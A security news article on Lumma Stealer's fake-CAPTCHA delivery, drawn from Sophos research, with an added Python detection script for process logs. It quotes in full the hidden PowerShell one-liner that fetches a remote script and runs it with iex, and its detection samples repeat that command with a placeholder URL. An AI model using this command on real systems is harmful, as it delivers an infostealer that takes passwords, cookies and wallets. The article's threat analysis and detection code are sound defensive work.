Lumma Stealer, a notorious information-stealing malware active since mid-2022, has significantly evolved its tactics, techniques, and procedures in recent months.
Believed to originate from Russian-speaking cybercriminals, this malware continues to be distributed as a Malware-as-a-Service (MaaS) offering, with its developers providing regular updates and support via Telegram channels and a dedicated Gitbook site.
The threat has become increasingly prevalent in cybersecurity incident reports, with thousands of infections documented in the past year alone.
The malware primarily targets valuable user data including passwords, session tokens, cryptocurrency wallets, and personal information from compromised devices.
What makes Lumma particularly dangerous is its sophisticated delivery techniques, which have recently expanded to include social engineering through fake CAPTCHA challenges and deceptive download prompts.
These methods exploit user trust in familiar security verification processes, tricking victims into executing malicious commands on their own systems.
Sophos researchers identified multiple Lumma Stealer campaigns during fall and winter 2024-25, documenting how the malware’s tactics have evolved to evade detection.
“The variations we saw in Lumma Stealer behavior are significant to defenders,” noted the Sophos Managed Detection and Response team in their report, emphasizing that these delivery techniques could easily be adapted for other malware beyond Lumma Stealer.
Attack flow
One particularly concerning innovation involves the abuse of Windows PowerShell through deceptive CAPTCHA verification pages.
In this attack chain, victims visiting malicious sites are presented with a standard “I’m not a robot” verification prompt, creating a false sense of security and legitimacy.
After clicking the verification box, users are redirected to a second page that instructs them to open the Windows “Run” dialog, then press Ctrl+V followed by Enter.
This seemingly harmless action actually pastes and executes a concealed PowerShell command that operates in a hidden window:

```powershell
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -command $uR='hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
```
The execution of this command initiates a sophisticated multi-stage attack process. The script retrieves additional malware components from command-and-control servers, ultimately downloading, extracting, and executing the core Lumma Stealer payload.
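The chain above leaves a recognisable process-creation footprint: PowerShell started from the Run dialog (parent explorer.exe) with a hidden window, a web fetch and iex. The following is an added detection example, not code from the article or from Sophos; it runs over constructed Sysmon Event ID 1-style records (field names Image, ParentImage, CommandLine, ProcessId), with the download URL replaced by a placeholder and the benign hosts and scripts hypothetical.

```python
import re

# Heuristics for the ClickFix-style chain above: PowerShell started from the
# Run dialog (parent explorer.exe) with a hidden window, a web fetch and iex.
INDICATORS = [
    # -W, -Win, -WindowStyle ... Hidden (PowerShell accepts parameter prefixes)
    ("hidden_window", re.compile(r"-w\w*\s+hidden", re.I)),
    ("web_download", re.compile(
        r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|net\.webclient", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I)),
]
REQUIRED = {"hidden_window", "web_download", "invoke_expression"}


def analyze_event(event: dict) -> dict:
    """Return matched indicators and a verdict for one process-creation event."""
    matched = [name for name, rx in INDICATORS if rx.search(event.get("CommandLine", ""))]
    image = event.get("Image", "").lower()
    is_powershell = image.endswith(("\\powershell.exe", "\\pwsh.exe"))
    # Win+R launches land under explorer.exe, but so do double-clicked shortcuts,
    # so the parent is only context; the verdict needs all three indicators too.
    from_run_dialog = event.get("ParentImage", "").lower().endswith("\\explorer.exe")
    suspicious = is_powershell and from_run_dialog and REQUIRED <= set(matched)
    return {"pid": event.get("ProcessId"), "indicators": matched, "suspicious": suspicious}


def triage(events: list) -> list:
    """Process IDs of the events that match the full chain."""
    return [r["pid"] for r in map(analyze_event, events) if r["suspicious"]]


# Constructed Sysmon Event ID 1-style records (hypothetical hosts; the first
# mirrors the quoted one-liner with the download URL replaced by a placeholder).
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CLICKFIX_CMD = (
    '"' + PS_EXE + '" -W Hidden -command '
    "$uR='https://PLACEHOLDER.invalid/new-artist.txt'; "
    "$reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t"
)
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": CLICKFIX_CMD},
    {"ProcessId": 5208, "Image": PS_EXE, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": PS_EXE + r" -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"ProcessId": 6016, "Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": PS_EXE + " -command Invoke-WebRequest -Uri https://intranet.example.invalid/r.csv -OutFile r.csv"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze_event(ev))
```

Commands typed into the Run dialog are also recorded under the user's RunMRU registry key, which gives forensic corroboration after the fact when process logging was not available.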
Once active, the malware systematically accesses browser data, as evidenced in Figure 6, where AutoIt3.exe can be seen accessing login data and cookies from Chrome.
What makes this attack vector particularly effective is its use of AES encryption to conceal subsequent payloads.
The malware employs sophisticated obfuscation techniques, including the use of initialization vectors and complex decryption routines, to evade traditional security measures.
This combination of social engineering and advanced technical methods represents a significant evolution in Lumma Stealer’s capabilities.
Security experts recommend implementing robust endpoint protection solutions with behavioral analysis capabilities, as signature-based detection alone proves inadequate against these evolving threats.
Organizations should also prioritize user education around the dangers of CAPTCHA challenges that request unusual actions, particularly those that involve running commands or scripts.